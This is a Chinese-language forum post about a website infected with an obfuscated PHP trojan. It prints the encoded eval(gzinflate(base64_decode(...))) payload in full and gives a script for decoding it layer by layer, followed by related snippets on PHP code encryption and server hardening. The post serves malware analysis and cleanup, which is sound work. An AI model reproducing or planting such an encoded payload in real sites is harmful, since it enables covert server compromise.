看到某论坛上有人报告说网站被挂加密马,贴出来的马码如下:
<?php
eval(gzinflate(base64_decode('DdI5jptQAADQ3pIPkWpmQmHMjhJlZAzfGGwGsAFDE302Ax+zGS/8a2VrUkRJpGjqadMlXS4Qpcqc4DXv/s3r+yZrxqPJy/Ho/b+vf54ef7z78vHD909/H38//fr89O3ni/Ho5WQ8Ss6wvN3jvEpL2Ce3ITwmHPM2TqI6Tm5v5FjnUdNYs5ls0RmaLPtdGx6BWyFuiGyJtO2FMCheNmykiN639dLA6dD2GnLQgMQKGiW9Ya1oaIMVlr1UIHqPyZfNKeO7c9zz4iRd8eIZi3wSmTwvihPTFLhJiEmC7oprGuOCdvlEhnhXZ7kvSmzJXkKCSNZRIgjhYkfwGV3ivd7bCil4h2nDqfrActfIA1fUHsn11i2z7bXo8y4c0gAGgOH2SB7k2pTcY85QwbJbSg/ypeQfugSQydauj0Y32NBRHI52vV0zU2BHwT5NVykSOtLG52lxtDChM6Y15EHp5TaJVvRG0Qtuubn6XbHQA42dsUVsMRsJ4CymdoWD16rilUbkVEStNEFIAcfnHdG1s0zZA3ewGmOeV01gIwD7cpVX2qqsmu6UWP6aAkUBnmX/AHzCMOzQbC6eZPG9TcEFCucXtpQoP9BqVd63EjGl53BnPrRkvFahovVKMmVW3s4/Movs4nYnQndDpB5mpELm2RBuZUNtD/78oQj6QK0cL5LbXO45dpbXBwiracRWolz5FhCnhCUroAMiZ9Tant7p264EJ9HZpEypEEyt4ah2NJdcIGoeK0iNVZ1tQJHgy/aKpNXhEmGBniR2w4cbMI8MgZrOD24cCVapRCZny7iAHnGe1Se4cEHQb5HSaPh4gstlaxZ0KqZnseyxSdCEk97c3d29Go/un6v/Bw==')));
?>
小研究了一下,拼凑出一个解密脚本:
<?php
$str=file_get_contents('e.txt');
while (preg_match("/eval\(gzinflate\(base64_decode\('([^']*)'/",$str,$match)){
$str=base64_decode($match[1]);
$str=gzinflate($str);
echo $str;
}
$fp=fopen('d.txt','w');
fputs($fp,$str);
fclose($fp);
?>
用法如下:
1、把木马内容保存到一个文件中,命名为e.txt
2、在相同目录再建一个空文件,命名为d.txt
3、在把解密脚本保存为文件: decode.php
4、在命令行窗口执行decode.php,执行完成后,d.txt里的就是解密木马了。
分享到:
相关推荐
总的来说,"风吟PHP 代码加密/解密.rar"为PHP开发者提供了一个简单但有效的代码保护方案,利用了base64和gzip压缩技术,旨在平衡代码的可读性和安全性。对于那些希望保护其知识产权,但又不想投入大量资源进行高级...
黑刀dezender5是一款功能强大的PHP解密工具,它能够解析并解密许多类型的PHP加密代码。这款工具的特点包括: - 支持多种加密算法:如Base64编码、gzcompress、gzinflate等。 - 自动识别和处理加密代码。 - 友好的...
结合这两种技术,"风吟PHP代码加密/解密"工具首先对PHP代码进行gzip压缩,减少其体积,然后用Base64编码将压缩后的数据转化为文本字符串,这样就形成了一个看似无意义的字符串,进一步增加了代码的保密性。...
php gzinflate base64_decode 解密 密码:caonima
我一直都比较关注代码的加解密,从简单eval base64,gzcompress,gzinflate 到 威盾,Zend Guard加密,到近期比较流行的一种二进制(unicode乱码)加密,如 phpjm,phpdp神盾。对比这几种加密方式。 第一种加密方式,就是...
最后,构建一个包含解压和执行语句的PHP脚本,并用`file_put_contents`写回文件。这样,当加密后的文件被执行时,PHP解释器会自动解压并执行编码的代码。 ```php <?php function encode_file_contents($filename) {...
对应的写了一个简单的解密的,专门针对eval。这个原理很有用途的,在这里记下。复制代码 代码如下:<?php /* author:zhiwushan date:20080411 */ //已经加密的文件内容 $a=” eval(gzinflate(str_rot13(base64_...
标题“php-gzinflate-multi-decrypt”涉及到的是一个PHP脚本,主要用于处理使用gzinflate压缩算法的加密数据的解密工作。在PHP中,gzinflate函数是gzip压缩格式的反向操作,它用于解压使用gzip算法压缩的数据。这个...
gzinflate(base64_decode( 为头的一个php文件。以下我们给出了相关的编码解码(加密解密)代码。 压缩编码(加密)代码: 复制代码 代码如下:<?php function encode_file_contents($filename) { $type=...
我们将使用一个混淆的 PHP 文件作为示例来演示这一过程。识别并移除混淆代码 识别并替换所有常量定义和字符编码,使代码更易于理解。 例如,将 chr(69).chr(88).chr(112).chr(79).chr(68).chr(101) 替换为 explode...
//已经加密的文件内容 $a=" eval(gzinflate(str_rot13(base64_decode('DdNUsptVAADQq2vn7+oFGU6VPb+EyE4EiSA2LhAZUZN2OP343eF9//f7+1S+Jd1KbNZ90SVY/jUv098JLgT1lSZmztJ/s/wNs/zrp5jd/XZLrter6I6...
本实例开发源码——“PHP实现的超强在线压缩解压缩脚本代码”提供了一个实用的功能,即允许用户通过Web界面在线对文件进行压缩或解压缩操作。这个功能对于网站管理员和开发者来说非常方便,可以提高工作效率,同时也...
2024PHP在线加密网页源码 前端采用Layui框架 更新内容: 1.加强算法强度 2.优化模版UI
- `gzinflate`是用于解压缩数据的一个函数,如果被恶意利用可能会造成大量流量消耗,因此将其加入禁用列表有助于减少风险。 2. **关闭URL fopen功能**: - 修改`allow_url_fopen`设置为`Off`。 - 示例:`allow_...
* gzinflate 函数:可以将gzinflate加密的字符串解密,例如`eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));` * gzuncompress 函数:可以将gzuncompress加密的字符串解密,例如`eval...
"大客户版卡盟源码.zip" 是一个包含多个文件的压缩包,主要涉及的是一个专为大型客户提供服务的卡盟平台的源代码。卡盟,全称是“虚拟商品集中交易市场”,它是一个在线平台,允许商家和消费者进行虚拟商品(如游戏...
在线压缩和解压是Web开发中的一个重要功能,尤其在处理大型文件或数据迁移时非常有用。PHP作为一种流行的服务器端脚本语言,提供了多种方法来实现这样的功能。在本例中,"在线压缩/解压PHP" 提供了一个方便的解决...
5. **gzinflate.php**:这可能是一个处理数据压缩的函数,gzinflate是PHP中用于解压gzip格式数据的函数,可能用于数据传输优化或者存储空间节省。 6. **phpinfo.php**:这是一个标准的PHP调试页面,运行后会显示...
这指的是使用PHP服务器端配合Pako.js(一个JavaScript实现的快速GZIP压缩库)以及Ajax异步请求,实现数据的压缩和传输。这种技术特别适用于需要频繁交互大量数据的Web应用,如实时图表、大数据分析展示等。 Pako.js...